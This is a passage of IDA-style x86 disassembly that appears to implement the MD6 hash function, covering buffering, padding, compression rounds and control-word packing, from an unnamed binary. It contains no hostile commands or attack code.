push 80h ; Size
lea eax, [ebp+Src]
push eax ; Src
add esi, 8
push esi ; Dst
call memcpy
add esp, 0Ch
jmp loc_9A9120
; ---------------------------------------------------------------------------
loc_9A91B3: ; CODE XREF: sub_9A90E2+B5�j
mov eax, [esi+16Ch]
inc eax
inc edi
cmp edi, eax
jl short loc_9A91E7
mov edi, eax
cmp edi, eax
jnz short loc_9A91E7
mov eax, [esi+edi*8+3BF0h]
or eax, [esi+edi*8+3BF4h]
jnz short loc_9A91E7
lea eax, [esi+edi*4+3B78h]
cmp dword ptr [eax], 0
jnz short loc_9A91E7
mov dword ptr [eax], 400h
loc_9A91E7: ; CODE XREF: sub_9A90E2+DB�j
; sub_9A90E2+E1�j ...
push 80h ; Size
lea eax, [ebp+Src]
push eax ; Src
lea ebx, [esi+edi*4+3B78h]
mov eax, [ebx]
shr eax, 3
mov ecx, edi
shl ecx, 9
add eax, esi
lea eax, [ecx+eax+178h]
push eax ; Dst
call memcpy
add dword ptr [ebx], 400h
lea eax, [esi+174h]
add esp, 0Ch
cmp edi, [eax]
jle short loc_9A9225
mov [eax], edi
loc_9A9225: ; CODE XREF: sub_9A90E2+13F�j
push [ebp+arg_8]
push edi
push esi
call sub_9A90E2
add esp, 0Ch
loc_9A9232: ; CODE XREF: sub_9A90E2+40�j
; sub_9A90E2+AC�j
pop edi
loc_9A9233: ; CODE XREF: sub_9A90E2+23�j
pop esi
pop ebx
leave
retn
sub_9A90E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9237 proc near ; CODE XREF: sub_9A8D34+42�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
xor eax, eax
cmp esi, eax
jnz short loc_9A9248
push 3
jmp short loc_9A925B
; ---------------------------------------------------------------------------
loc_9A9248: ; CODE XREF: sub_9A9237+B�j
cmp [esi+10Ch], eax
jnz short loc_9A9254
push 5
jmp short loc_9A925B
; ---------------------------------------------------------------------------
loc_9A9254: ; CODE XREF: sub_9A9237+17�j
cmp [ebp+arg_4], eax
jnz short loc_9A9261
push 8
loc_9A925B: ; CODE XREF: sub_9A9237+F�j
; sub_9A9237+1B�j
pop eax
jmp loc_9A935C
; ---------------------------------------------------------------------------
loc_9A9261: ; CODE XREF: sub_9A9237+20�j
cmp [ebp+arg_C], eax
push ebx
mov [ebp+arg_0], eax
jb loc_9A9359
ja short loc_9A9279
cmp [ebp+arg_8], eax
jbe loc_9A9359
loc_9A9279: ; CODE XREF: sub_9A9237+37�j
; sub_9A9237+10E�j ...
mov edx, [ebp+arg_8]
mov eax, [ebp+arg_C]
mov ecx, 1000h
sub ecx, [esi+3B7Ch]
xor ebx, ebx
sub edx, [ebp+arg_0]
sbb eax, ebx
cmp eax, ebx
ja short loc_9A929F
jb short loc_9A929B
cmp edx, ecx
jnb short loc_9A929F
loc_9A929B: ; CODE XREF: sub_9A9237+5E�j
mov ebx, edx
jmp short loc_9A92A1
; ---------------------------------------------------------------------------
loc_9A929F: ; CODE XREF: sub_9A9237+5C�j
; sub_9A9237+62�j
mov ebx, ecx
loc_9A92A1: ; CODE XREF: sub_9A9237+66�j
test bl, 7
jnz short loc_9A92DB
mov eax, [esi+3B7Ch]
test al, 7
jnz short loc_9A92DB
test byte ptr [ebp+arg_0], 7
jnz short loc_9A92DB
mov ecx, ebx
shr ecx, 3
push ecx ; Size
mov ecx, [ebp+arg_0]
shr ecx, 3
add ecx, [ebp+arg_4]
shr eax, 3
push ecx ; Src
lea eax, [eax+esi+378h]
push eax ; Dst
call memcpy
add esp, 0Ch
jmp short loc_9A92FB
; ---------------------------------------------------------------------------
loc_9A92DB: ; CODE XREF: sub_9A9237+6D�j
; sub_9A9237+77�j ...
mov eax, [ebp+arg_0]
shr eax, 3
add eax, [ebp+arg_4]
push ebx
push eax
push dword ptr [esi+3B7Ch]
lea eax, [esi+378h]
push eax
call sub_9A8E48
add esp, 10h
loc_9A92FB: ; CODE XREF: sub_9A9237+A2�j
add [esi+3B7Ch], ebx
add [ebp+arg_0], ebx
add [esi+110h], ebx
mov eax, [esi+3B7Ch]
adc dword ptr [esi+114h], 0
cmp eax, 1000h
jnz short loc_9A9340
xor eax, eax
cmp eax, [ebp+arg_C]
ja short loc_9A9340
jb short loc_9A932F
mov eax, [ebp+arg_0]
cmp eax, [ebp+arg_8]
jnb short loc_9A9340
loc_9A932F: ; CODE XREF: sub_9A9237+EE�j
push 0
push 1
push esi
call sub_9A90E2
add esp, 0Ch
test eax, eax
jnz short loc_9A935B
loc_9A9340: ; CODE XREF: sub_9A9237+E5�j
; sub_9A9237+EC�j ...
xor eax, eax
cmp eax, [ebp+arg_C]
jb loc_9A9279
ja short loc_9A9359
mov eax, [ebp+arg_8]
cmp [ebp+arg_0], eax
jb loc_9A9279
loc_9A9359: ; CODE XREF: sub_9A9237+31�j
; sub_9A9237+3C�j ...
xor eax, eax
loc_9A935B: ; CODE XREF: sub_9A9237+107�j
pop ebx
loc_9A935C: ; CODE XREF: sub_9A9237+25�j
pop esi
pop ebp
retn
sub_9A9237 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A935F proc near ; CODE XREF: sub_9A942A+8A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
mov esi, [ebp+arg_0]
mov ecx, [esi]
push edi
lea eax, [ecx+7]
cdq
push 8
pop edi
idiv edi
push 8
mov ebx, 80h
mov edi, eax
mov eax, ecx
cdq
pop ecx
idiv ecx
test edi, edi
mov [ebp+var_C], edi
mov [ebp+var_8], edx
jle short loc_9A93A4
mov ecx, ebx
lea eax, [esi+8]
sub ecx, edi
mov [ebp+arg_0], edi
loc_9A9399: ; CODE XREF: sub_9A935F+43�j
mov dl, [ecx+eax]
mov [eax], dl
inc eax
dec [ebp+arg_0]
jnz short loc_9A9399
loc_9A93A4: ; CODE XREF: sub_9A935F+2E�j
cmp edi, ebx
jge short loc_9A93C5
lea edx, [edi+esi+8]
mov ecx, ebx
sub ecx, edi
mov edi, edx
mov edx, ecx
shr ecx, 2
xor eax, eax
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
mov edi, [ebp+var_C]
loc_9A93C5: ; CODE XREF: sub_9A935F+47�j
cmp [ebp+var_8], 0
jle short loc_9A9425
test edi, edi
jle short loc_9A9425
push 8
pop eax
sub eax, [ebp+var_8]
mov [ebp+var_4], 0FFFFFFF9h
sub [ebp+var_4], esi
mov [ebp+arg_0], 0FFFFFFF8h
sub [ebp+arg_0], esi
mov [ebp+var_10], eax
lea eax, [esi+8]
loc_9A93EF: ; CODE XREF: sub_9A935F+C4�j
mov dl, [eax]
mov ecx, [ebp+var_10]
shl dl, cl
mov ecx, [ebp+var_4]
add ecx, eax
cmp ecx, ebx
mov [eax], dl
jge short loc_9A941B
mov ecx, [ebp+arg_0]
mov edi, [ebp+var_C]
add ecx, eax
mov bl, [ecx+esi+9]
mov cl, byte ptr [ebp+var_8]
shr bl, cl
or bl, dl
mov [eax], bl
mov ebx, 80h
loc_9A941B: ; CODE XREF: sub_9A935F+A0�j
mov ecx, [ebp+arg_0]
inc eax
add ecx, eax
cmp ecx, edi
jl short loc_9A93EF
loc_9A9425: ; CODE XREF: sub_9A935F+6A�j
; sub_9A935F+6E�j
pop edi
pop esi
pop ebx
leave
retn
sub_9A935F endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9A942A(int,void *Dst)
sub_9A942A proc near ; CODE XREF: sub_9A8D34+50�p
arg_0 = dword ptr 4
Dst = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_9A9437
push 3
jmp short loc_9A9442
; ---------------------------------------------------------------------------
loc_9A9437: ; CODE XREF: sub_9A942A+7�j
cmp dword ptr [esi+10Ch], 0
jnz short loc_9A9445
push 5
loc_9A9442: ; CODE XREF: sub_9A942A+B�j
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_9A9445: ; CODE XREF: sub_9A942A+14�j
push ebx
xor ebx, ebx
inc ebx
cmp [esi+120h], ebx
jz short loc_9A94C1
mov ecx, [esi+174h]
cmp ecx, ebx
mov eax, ebx
jz short loc_9A9476
jl short loc_9A9476
lea ecx, [esi+3B7Ch]
loc_9A9465: ; CODE XREF: sub_9A942A+4A�j
cmp dword ptr [ecx], 0
ja short loc_9A9476
inc eax
add ecx, 4
cmp eax, [esi+174h]
jle short loc_9A9465
loc_9A9476: ; CODE XREF: sub_9A942A+31�j
; sub_9A942A+33�j ...
push ebx
push eax
push esi
call sub_9A90E2
add esp, 0Ch
test eax, eax
jnz short loc_9A94C3
push edi
lea edi, [esi+8]
push 10h
push edi
call sub_9A8E1C
cmp [esp+14h+Dst], 0
pop ecx
pop ecx
jz short loc_9A94B3
mov eax, [esi]
add eax, 7
push 8
pop ecx
cdq
idiv ecx
push eax ; Size
push edi ; Src
push [esp+14h+Dst] ; Dst
call memcpy
add esp, 0Ch
loc_9A94B3: ; CODE XREF: sub_9A942A+6E�j
push esi
call sub_9A935F
pop ecx
mov [esi+120h], ebx
pop edi
loc_9A94C1: ; CODE XREF: sub_9A942A+25�j
xor eax, eax
loc_9A94C3: ; CODE XREF: sub_9A942A+59�j
pop ebx
pop esi
retn
sub_9A942A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A94C6 proc near ; CODE XREF: sub_9A9C7E+63�p
var_54 = dword ptr -54h
var_4C = dword ptr -4Ch
var_44 = dword ptr -44h
var_3C = dword ptr -3Ch
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
mov ecx, [ebp+arg_4]
shl ecx, 4
test ecx, ecx
mov [ebp+var_C], 89ABCDEFh
mov [ebp+var_8], 1234567h
jle locret_9A9C7C
mov eax, [ebp+arg_0]
add eax, 1D0h
dec ecx
push ebx
shr ecx, 4
inc ecx
push esi
mov [ebp+var_4], ecx
push edi
loc_9A94FB: ; CODE XREF: sub_9A94C6+7AD�j
mov edi, [eax+50h]
mov ebx, [eax+68h]
mov esi, [eax+54h]
mov edx, [eax-11Ch]
and edx, [eax+4]
and ebx, edi
mov ecx, [eax-120h]
and ecx, [eax]
mov edi, [eax+6Ch]
xor ecx, ebx
xor ecx, [eax-1D0h]
and edi, esi
xor edx, edi
xor edx, [eax-1CCh]
mov esi, [eax+70h]
xor edx, [eax+74h]
xor ecx, esi
xor ecx, [ebp+var_C]
xor edx, [ebp+var_8]
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 0Ah
xor ecx, edi
shr ebx, 0Ah
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 0Bh
xor ebx, edx
mov edx, [eax-114h]
and edx, [eax+0Ch]
shl edi, 0Bh
xor edi, ecx
mov ecx, [eax-118h]
and ecx, [eax+8]
mov [eax+0FCh], ebx
mov ebx, [eax+58h]
and esi, ebx
mov ebx, [eax+74h]
mov [eax+0F8h], edi
mov edi, [eax+5Ch]
and ebx, edi
xor edx, ebx
xor edx, [eax-1C4h]
xor ecx, esi
xor ecx, [eax-1C8h]
mov esi, [eax+7Ch]
xor ecx, [eax+78h]
xor edx, esi
xor ecx, [ebp+var_C]
xor edx, [ebp+var_8]
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 5
xor ecx, edi
shr ebx, 5
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 18h
shl edi, 18h
xor edi, ecx
xor ebx, edx
mov edx, [eax-10Ch]
and edx, [eax+14h]
lea ecx, [eax+80h]
mov [ebp+arg_4], ecx
mov ecx, [eax-110h]
and ecx, [eax+10h]
mov [eax+100h], edi
mov edi, [eax+60h]
and edi, [eax+78h]
mov [eax+104h], ebx
mov ebx, [eax+64h]
and ebx, esi
mov esi, [ebp+arg_4]
xor ecx, edi
xor ecx, [eax-1C0h]
mov edi, [esi]
xor edx, ebx
xor edx, [eax-1BCh]
mov esi, [esi+4]
xor ecx, edi
xor ecx, [ebp+var_C]
xor edx, esi
xor edx, [ebp+var_8]
mov [ebp+var_30], esi
mov esi, ecx
mov ebx, edx
shrd esi, ebx, 0Dh
xor ecx, esi
shr ebx, 0Dh
xor edx, ebx
mov esi, ecx
mov ebx, edx
shld ebx, esi, 9
xor ebx, edx
mov edx, [eax-104h]
and edx, [eax+1Ch]
shl esi, 9
xor esi, ecx
mov ecx, [eax-108h]
and ecx, [eax+18h]
mov [eax+108h], esi
mov esi, [eax+68h]
and esi, edi
mov edi, [eax+6Ch]
and edi, [ebp+var_30]
xor ecx, esi
xor ecx, [eax-1B8h]
mov esi, [eax+88h]
xor edx, edi
xor edx, [eax-1B4h]
xor ecx, esi
xor edx, [eax+8Ch]
xor ecx, [ebp+var_C]
xor edx, [ebp+var_8]
mov [eax+10Ch], ebx
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 0Ah
xor ecx, edi
shr ebx, 0Ah
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 10h
shl edi, 10h
xor edi, ecx
mov ecx, [eax-100h]
and ecx, [eax+20h]
xor ebx, edx
mov edx, [eax-0FCh]
and edx, [eax+24h]
mov [eax+110h], edi
mov edi, [eax+70h]
and edi, esi
mov esi, [eax+74h]
and esi, [eax+8Ch]
xor ecx, edi
xor ecx, [eax-1B0h]
xor edx, esi
xor edx, [eax-1ACh]
mov esi, [eax+90h]
xor edx, [eax+94h]
xor ecx, esi
xor ecx, [ebp+var_C]
xor edx, [ebp+var_8]
mov [eax+114h], ebx
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 0Bh
shr ebx, 0Bh
xor ecx, edi
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 0Fh
shl edi, 0Fh
xor edi, ecx
xor ebx, edx
mov [eax+118h], edi
mov edx, [eax-0F4h]
and edx, [eax+2Ch]
mov edi, [eax+94h]
and edi, [eax+7Ch]
mov ecx, [eax-0F8h]
and ecx, [eax+28h]
and esi, [eax+78h]
xor edx, edi
xor edx, [eax-1A4h]
xor ecx, esi
xor ecx, [eax-1A8h]
xor edx, [eax+9Ch]
mov esi, [eax+98h]
xor edx, [ebp+var_8]
xor ecx, esi
xor ecx, [ebp+var_C]
mov [eax+11Ch], ebx
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 0Ch
xor ecx, edi
shr ebx, 0Ch
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 9
xor ebx, edx
mov edx, [eax-0ECh]
and edx, [eax+34h]
shl edi, 9
xor edi, ecx
mov ecx, [eax-0F0h]
and ecx, [eax+30h]
mov [eax+124h], ebx
mov ebx, [ebp+arg_4]
mov [eax+120h], edi
mov edi, esi
and edi, [ebx]
mov ebx, [eax+9Ch]
and ebx, [ebp+var_30]
xor ecx, edi
xor ecx, [eax-1A0h]
xor edx, ebx
xor edx, [eax-19Ch]
xor ecx, [eax+0A0h]
xor edx, [eax+0A4h]
xor ecx, [ebp+var_C]
xor edx, [ebp+var_8]
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 2
xor ecx, edi
shr ebx, 2
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 1Bh
xor ebx, edx
mov edx, [eax-0E4h]
and edx, [eax+3Ch]
shl edi, 1Bh
xor edi, ecx
mov ecx, [eax-0E8h]
and ecx, [eax+38h]
mov [eax+128h], edi
mov edi, [eax+0A0h]
and edi, [eax+88h]
mov [eax+12Ch], ebx
mov ebx, [eax+0A4h]
and ebx, [eax+8Ch]
xor ecx, edi
xor ecx, [eax-198h]
xor edx, ebx
xor edx, [eax-194h]
xor ecx, [eax+0A8h]
xor edx, [eax+0ACh]
xor ecx, [ebp+var_C]
xor edx, [ebp+var_8]
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 7
xor ecx, edi
shr ebx, 7
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 0Fh
xor ebx, edx
mov edx, [eax-0DCh]
and edx, [eax+44h]
shl edi, 0Fh
xor edi, ecx
mov ecx, [eax+0B0h]
mov [ebp+var_14], ecx
mov ecx, [eax+0B4h]
mov [ebp+var_10], ecx
mov ecx, [eax-0E0h]
and ecx, [eax+40h]
mov [eax+130h], edi
mov edi, [eax+0A8h]
and edi, [eax+90h]
mov [eax+134h], ebx
mov ebx, [eax+0ACh]
and ebx, [eax+94h]
xor ecx, edi
xor ecx, [eax-190h]
xor edx, ebx
xor edx, [eax-18Ch]
xor ecx, [ebp+var_14]
xor edx, [ebp+var_10]
xor ecx, [ebp+var_C]
xor edx, [ebp+var_8]
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 0Eh
xor ecx, edi
shr ebx, 0Eh
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 6
shl edi, 6
xor edi, ecx
mov ecx, [eax-0D8h]
and ecx, [eax+48h]
xor ebx, edx
mov edx, [eax-0D4h]
and edx, [eax+4Ch]
mov [eax+138h], edi
mov edi, [ebp+var_14]
and edi, esi
mov esi, [ebp+var_10]
and esi, [eax+9Ch]
xor ecx, edi
xor ecx, [eax-188h]
xor edx, esi
xor edx, [eax-184h]
xor ecx, [eax+0B8h]
xor edx, [eax+0BCh]
xor ecx, [ebp+var_C]
mov esi, [ebp+var_8]
mov [eax+13Ch], ebx
xor edx, esi
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 0Fh
xor ecx, edi
shr ebx, 0Fh
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 2
shl edi, 2
xor edi, ecx
mov ecx, [eax-0D0h]
and ecx, [eax+50h]
xor ebx, edx
mov edx, [eax-0CCh]
and edx, [eax+54h]
mov [eax+140h], edi
mov edi, [eax+0B8h]
mov [eax+144h], ebx
and edi, [eax+0A0h]
mov ebx, [eax+0BCh]
and ebx, [eax+0A4h]
xor ecx, edi
xor ecx, [eax-180h]
xor edx, ebx
xor edx, [eax-17Ch]
xor ecx, [eax+0C0h]
xor edx, [eax+0C4h]
xor ecx, [ebp+var_C]
xor edx, esi
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 7
xor ecx, edi
shr ebx, 7
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 1Dh
xor ebx, edx
mov edx, [eax-0C4h]
and edx, [eax+5Ch]
shl edi, 1Dh
xor edi, ecx
mov ecx, [eax-0C8h]
and ecx, [eax+58h]
mov [eax+148h], edi
mov edi, [eax+0C0h]
and edi, [eax+0A8h]
mov [eax+14Ch], ebx
mov ebx, [eax+0C4h]
and ebx, [eax+0ACh]
xor ecx, edi
xor ecx, [eax-178h]
xor edx, ebx
xor edx, [eax-174h]
xor ecx, [eax+0C8h]
xor edx, [eax+0CCh]
xor ecx, [ebp+var_C]
xor edx, esi
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 0Dh
xor ecx, edi
shr ebx, 0Dh
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 8
shl edi, 8
xor edi, ecx
mov ecx, [eax+0D0h]
mov [ebp+var_1C], ecx
mov ecx, [eax+0D4h]
mov [eax+150h], edi
mov edi, [ebp+var_14]
and edi, [eax+0C8h]
xor ebx, edx
mov edx, [eax-0BCh]
and edx, [eax+64h]
mov [ebp+var_18], ecx
mov ecx, [eax-0C0h]
and ecx, [eax+60h]
mov [ebp+var_3C], edi
mov edi, [ebp+var_10]
and edi, [eax+0CCh]
xor ecx, [ebp+var_3C]
xor edx, edi
xor ecx, [eax-170h]
xor edx, [eax-16Ch]
xor ecx, [ebp+var_1C]
xor edx, [ebp+var_18]
xor ecx, [ebp+var_C]
mov [eax+154h], ebx
xor edx, esi
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 0Bh
shr ebx, 0Bh
xor ecx, edi
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 0Fh
xor ebx, edx
mov edx, [eax-0B4h]
and edx, [eax+6Ch]
shl edi, 0Fh
xor edi, ecx
mov ecx, [eax+0D8h]
mov [ebp+var_24], ecx
mov ecx, [eax+0DCh]
mov [eax+158h], edi
mov edi, [eax+0B8h]
mov [eax+15Ch], ebx
mov ebx, [ebp+var_1C]
and ebx, edi
mov edi, [ebp+var_18]
mov [ebp+var_20], ecx
mov ecx, [eax-0B8h]
and ecx, [eax+68h]
mov [ebp+var_44], ebx
xor ecx, [ebp+var_44]
mov ebx, [eax+0BCh]
xor ecx, [eax-168h]
and edi, ebx
xor ecx, [ebp+var_24]
xor edx, edi
xor edx, [eax-164h]
xor ecx, [ebp+var_C]
xor edx, [ebp+var_20]
mov edi, ecx
xor edx, esi
mov ebx, edx
shrd edi, ebx, 7
xor ecx, edi
shr ebx, 7
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 5
xor ebx, edx
mov edx, [eax-0ACh]
and edx, [eax+74h]
shl edi, 5
xor edi, ecx
mov ecx, [eax+0E0h]
mov [eax+160h], edi
mov edi, [eax+0C0h]
mov [eax+164h], ebx
mov ebx, [ebp+var_24]
and ebx, edi
mov edi, [ebp+var_20]
mov [ebp+var_2C], ecx
mov ecx, [eax+0E4h]
mov [ebp+var_28], ecx
mov ecx, [eax-0B0h]
and ecx, [eax+70h]
mov [ebp+var_4C], ebx
xor ecx, [ebp+var_4C]
mov ebx, [eax+0C4h]
xor ecx, [eax-160h]
and edi, ebx
xor ecx, [ebp+var_2C]
xor edx, edi
xor edx, [eax-15Ch]
xor ecx, [ebp+var_C]
xor edx, [ebp+var_28]
mov edi, ecx
xor edx, esi
mov ebx, edx
shrd edi, ebx, 6
shr ebx, 6
xor ecx, edi
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 1Fh
shl edi, 1Fh
xor edi, ecx
xor ebx, edx
mov ecx, [eax-0A8h]
and ecx, [eax+78h]
mov edx, [eax-0A4h]
and edx, [eax+7Ch]
mov [eax+168h], edi
mov edi, [eax+0C8h]
mov [eax+16Ch], ebx
mov ebx, [ebp+var_2C]
and ebx, edi
mov edi, [ebp+var_28]
mov [ebp+var_54], ebx
mov ebx, [eax+0CCh]
xor ecx, [ebp+var_54]
and edi, ebx
xor ecx, [eax-158h]
xor edx, edi
xor edx, [eax-154h]
xor ecx, [eax+0E8h]
xor edx, [eax+0ECh]
xor ecx, [ebp+var_C]
xor edx, esi
mov ebx, edx
mov edi, ecx
shrd edi, ebx, 0Ch
xor ecx, edi
shr ebx, 0Ch
xor edx, ebx
mov ebx, edx
mov edi, ecx
shld ebx, edi, 9
xor ebx, edx
shl edi, 9
xor edi, ecx
mov [eax+170h], edi
mov [eax+174h], ebx
mov eax, [ebp+var_C]
and eax, 2425CFA0h
mov edx, esi
shr edx, 1Fh
xor eax, edx
mov edx, [ebp+var_C]
mov ecx, esi
shld esi, edx, 1
and ecx, 7311C281h
xor edi, edi
shl edx, 1
xor ecx, edi
xor eax, edx
xor ecx, esi
dec [ebp+var_4]
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_8], ecx
jnz loc_9A94FB
pop edi
pop esi
pop ebx
locret_9A9C7C: ; CODE XREF: sub_9A94C6+1C�j
leave
retn
sub_9A94C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A9C7E(int,void *Src,int,void *Val)
sub_9A9C7E proc near ; CODE XREF: sub_9A9E4E+DC�p
arg_0 = dword ptr 8
Src = dword ptr 0Ch
arg_8 = dword ptr 10h
Val = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+Src], 0
push ebx
push edi
mov edi, [ebp+Val]
mov ebx, edi
jnz short loc_9A9C92
push 9
jmp short loc_9A9C9A
; ---------------------------------------------------------------------------
loc_9A9C92: ; CODE XREF: sub_9A9C7E+E�j
cmp [ebp+arg_0], 0
jnz short loc_9A9CA0
push 0Fh
loc_9A9C9A: ; CODE XREF: sub_9A9C7E+12�j
pop eax
jmp loc_9A9D25
; ---------------------------------------------------------------------------
loc_9A9CA0: ; CODE XREF: sub_9A9C7E+18�j
push esi
mov esi, [ebp+arg_8]
test esi, esi
jl short loc_9A9D21
cmp esi, 0FFh
jg short loc_9A9D21
test edi, edi
jnz short loc_9A9CD1
mov eax, esi
shl eax, 4
add eax, 59h
push 8 ; SizeOfElements
push eax ; NumOfElements
call calloc
mov edi, eax
test edi, edi
pop ecx
pop ecx
jnz short loc_9A9CD1
push 12h
jmp short loc_9A9D23
; ---------------------------------------------------------------------------
loc_9A9CD1: ; CODE XREF: sub_9A9C7E+34�j
; sub_9A9C7E+4D�j
push 2C8h ; Size
push [ebp+Src] ; Src
push edi ; Dst
call memcpy
push esi
push edi
call sub_9A94C6
shl esi, 7
push 80h ; Size
lea eax, [esi+edi+248h]
push eax ; Src
push [ebp+arg_0] ; Dst
call memcpy
add esp, 20h
test ebx, ebx
jnz short loc_9A9D1D
add esi, 2C8h
push esi ; Size
push ebx ; Val
push edi ; Dst
call memset
push edi ; Memory
call free
add esp, 10h
loc_9A9D1D: ; CODE XREF: sub_9A9C7E+85�j
xor eax, eax
jmp short loc_9A9D24
; ---------------------------------------------------------------------------
loc_9A9D21: ; CODE XREF: sub_9A9C7E+28�j
; sub_9A9C7E+30�j
push 11h
loc_9A9D23: ; CODE XREF: sub_9A9C7E+51�j
pop eax
loc_9A9D24: ; CODE XREF: sub_9A9C7E+A1�j
pop esi
loc_9A9D25: ; CODE XREF: sub_9A9C7E+1D�j
pop edi
pop ebx
pop ebp
retn
sub_9A9C7E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9D29 proc near ; CODE XREF: sub_9A9DA3+79�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
cdq
shld edx, eax, 8
shl eax, 8
mov ecx, eax
mov eax, [ebp+arg_4]
push esi
mov esi, edx
cdq
or ecx, eax
mov eax, [ebp+arg_8]
or esi, edx
shld esi, ecx, 4
shl ecx, 4
cdq
or ecx, eax
mov eax, [ebp+arg_C]
or esi, edx
shld esi, ecx, 10h
shl ecx, 10h
cdq
or ecx, eax
mov eax, [ebp+arg_10]
or esi, edx
shld esi, ecx, 8
cdq
shl ecx, 8
or ecx, eax
mov eax, [ebp+arg_14]
or esi, edx
shld esi, ecx, 0Ch
cdq
shl ecx, 0Ch
or ecx, eax
or esi, edx
mov edx, esi
mov eax, ecx
pop esi
pop ebp
retn
sub_9A9D29 endp
; =============== S U B R O U T I N E =======================================
sub_9A9D87 proc near ; CODE XREF: sub_9A9DA3+4C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cdq
mov ecx, eax
mov eax, [esp+arg_4]
cdq
push esi
xor esi, esi
shl ecx, 18h
or esi, eax
or ecx, edx
mov eax, esi
mov edx, ecx
pop esi
retn
sub_9A9D87 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9DA3 proc near ; CODE XREF: sub_9A9E4E+C5�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
Src = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
arg_2C = dword ptr 34h
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_4]
push esi
push edi
mov edi, [ebp+arg_0]
push 0Fh
pop esi
mov eax, edi
sub ecx, edi
mov [ebp+arg_0], esi
loc_9A9DBB: ; CODE XREF: sub_9A9DA3+2A�j
mov edx, [ecx+eax]
mov [eax], edx
mov edx, [ecx+eax+4]
mov [eax+4], edx
add eax, 8
dec [ebp+arg_0]
jnz short loc_9A9DBB
mov ecx, [ebp+arg_8]
xor eax, eax
loc_9A9DD4: ; CODE XREF: sub_9A9DA3+44�j
mov edx, [ecx+eax*8]
mov [edi+esi*8], edx
mov edx, [ecx+eax*8+4]
mov [edi+esi*8+4], edx
inc esi
inc eax
cmp eax, 8
jl short loc_9A9DD4
push [ebp+arg_10]
push [ebp+arg_C]
call sub_9A9D87
mov [ebp+Src], eax
push 8 ; Size
lea eax, [ebp+Src]
push eax ; Src
lea eax, [edi+esi*8]
push eax ; Dst
mov [ebp+var_4], edx
call memcpy
push [ebp+arg_28]
inc esi
push [ebp+arg_24]
push [ebp+arg_20]
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_14]
call sub_9A9D29
mov [ebp+var_10], eax
push 8 ; Size
lea eax, [ebp+var_10]
push eax ; Src
lea esi, [edi+esi*8]
push esi ; Dst
mov [ebp+var_C], edx
call memcpy
push 200h ; Size
push [ebp+arg_2C] ; Src
add esi, 8
push esi ; Dst
call memcpy
add esp, 44h
pop edi
pop esi
leave
retn
sub_9A9DA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
